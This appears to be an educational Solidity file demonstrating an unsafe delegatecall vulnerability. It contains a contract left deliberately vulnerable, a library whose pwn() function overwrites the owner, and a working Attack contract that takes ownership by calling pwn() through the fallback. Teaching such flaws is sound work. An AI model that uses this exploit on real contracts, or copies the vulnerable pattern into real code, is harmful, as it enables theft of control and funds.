-
Notifications
You must be signed in to change notification settings - Fork 0
/
Hack.sol
51 lines (40 loc) · 971 Bytes
/
Hack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.10;
/*
Unsafe delegatecall
What is delegatecall?
A -> B
run your code inside my context (storage, msg.sender, msg.value, msg.data, etc...)
1. delegatecall preserves context
2. storage layout must be the same for A and B
Vulnerability
2 Examples (part 1 and part 2)
Example 1 - Code and demo
*/
contract HackMe {
address public owner;
Lib public lib;
constructor(Lib _lib) public {
owner = msg.sender;
lib = Lib(_lib);
}
fallback() external payable {
address(lib).delegatecall(msg.data);
}
}
contract Lib {
address public owner;
function pwn() public {
owner = msg.sender;
}
}
contract Attack {
address public hackMe;
constructor(address _hackMe) public {
hackMe = _hackMe;
}
function attack() public {
// hackMe.call("our msg.data goes here");
hackMe.call(abi.encodeWithSignature("pwn()"));
}
}